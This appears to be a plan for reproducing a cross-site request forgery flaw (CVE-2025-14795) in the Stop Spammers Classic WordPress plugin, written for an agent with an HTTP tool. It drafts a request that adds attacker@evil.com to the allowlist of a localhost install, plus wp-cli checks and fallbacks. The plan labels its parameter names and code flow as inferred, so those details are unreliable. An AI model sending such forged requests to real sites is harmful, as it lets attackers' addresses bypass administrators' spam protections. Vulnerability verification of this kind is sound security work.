Stop Spammers Classic <= 2026.1 - Cross-Site Request Forgery via Email Allowlist

This research plan outlines the steps to verify and exploit CVE-2025-14795, a CSRF vulnerability in the Stop Spammers Classic plugin.

---

1. Vulnerability Summary

• Vulnerability: Cross-Site Request Forgery (CSRF)
• Class/Component: ss_addtoallowlist (inferred from CVE description)
• Root Cause: The class responsible for adding email addresses to the spam allowlist does not implement nonce validation (e.g., check_admin_referer or check_ajax_referer). This allows an attacker to trick a logged-in administrator into adding any email address to the plugin's allowlist, effectively bypassing spam protections for those addresses.
• Affected Versions: <= 2026.1
• Patch: Version 2026.2 adds nonce checks to the processing logic.

2. Attack Vector Analysis

• Endpoint: Admin Dashboard (/wp-admin/admin.php)
• Action/Page: The vulnerability resides in the logic that handles the "Add to Allowlist" action, likely triggered via the stop-spammers settings page or log entries.
• HTTP Method: Likely GET or POST. (Historically, this plugin has used GET parameters for quick allowlist actions from the log page).
• Payload Parameter: ss_add_to_allow_list or add_allow (inferred).
• Authentication: Requires a victim with manage_options capabilities (Administrator).
• Preconditions: The plugin must be active.

3. Code Flow (Inferred)

1. Hook Registration: The plugin registers an admin_init or admin_menu hook that instantiates the ss_addtoallowlist class.
2. Request Detection: In the class constructor or a processing method (e.g., process()), the code checks for the presence of a specific request parameter (e.g., $_GET['ss_add_to_allow_list']).
3. Processing (SINK): If the parameter exists, the code calls get_option('ss_stop_spammers_settings'), appends the new email to the allowlist array, and saves it using update_option().
4. Vulnerability: Between step 2 and 3, there is no call to check_admin_referer(), allowing requests to originate from external domains.

4. Nonce Acquisition Strategy

According to the vulnerability description, the ss_addtoallowlist class completely misses nonce validation.

• Conclusion: No nonce is required to exploit this vulnerability in the affected versions. The exploit can be triggered via a direct request.

5. Exploitation Strategy

The goal is to simulate a CSRF attack where an administrator's browser is forced to send a request that adds attacker@evil.com to the allowlist.

Step-by-Step Plan:

1. Identification: Use the agent to search for the class file (likely classes/ss_addtoallowlist.php or similar) to identify the exact parameter name.
2. Request Formulation: Construct an HTTP request to wp-admin/admin.php with the necessary parameters.
3. Simulation: Use the http_request tool with the administrator's cookies to simulate the hijacked session.

Draft Payload (Example - using inferred parameters):

• URL: http://localhost:8080/wp-admin/admin.php
• Method: GET
• Query Params:
  • page: stop-spammers (or the relevant sub-page slug)
  • ss_add_to_allow_list: attacker@evil.com

HTTP Request Execution:

// Using http_request via the agent
await http_request({
  url: "http://localhost:8080/wp-admin/admin.php?page=stop-spammers&ss_add_to_allow_list=attacker@evil.com",
  method: "GET",
  follow_redirects: true
});

6. Test Data Setup

1. Install Plugin: Install Stop Spammers Classic version 2026.1.
2. Active Session: Ensure the agent is operating with a user that has administrator privileges.
3. Initial State: Confirm that attacker@evil.com is NOT currently in the allowlist.

7. Expected Results

• HTTP Response: A 200 OK or 302 Redirect (if the plugin redirects back to the settings page).
• Behavior: The plugin's internal settings for the "Email Allowlist" (often stored in the ss_stop_spammers_settings option) should now include attacker@evil.com.

8. Verification Steps

After sending the request, use wp-cli to verify the state of the database:

# Get the current settings option
wp option get ss_stop_spammers_settings

# Check if the allowlist array/string contains the target email
# Note: The structure might be a serialized array.
wp option get ss_stop_spammers_settings --format=json | grep "attacker@evil.com"

9. Alternative Approaches

If a simple GET request fails:

1. Check for POST: Analyze the source code to see if the logic requires $_POST. If so, use http_request with method: "POST" and body: "ss_add_to_allow_list=attacker@evil.com&action=...".
2. Check for Admin-Ajax: Some versions of this plugin might route requests through admin-ajax.php. Search the code for wp_ajax_ss_add_to_allow_list.
3. Verify Parameter Name: If ss_add_to_allow_list is incorrect, search the source for update_option calls within ss_addtoallowlist.php to find what variable is being saved. Look for:

   grep -rn "update_option" wp-content/plugins/stop-spammer-registrations-plugin/
   

   This will reveal the option name and the surrounding logic for user input.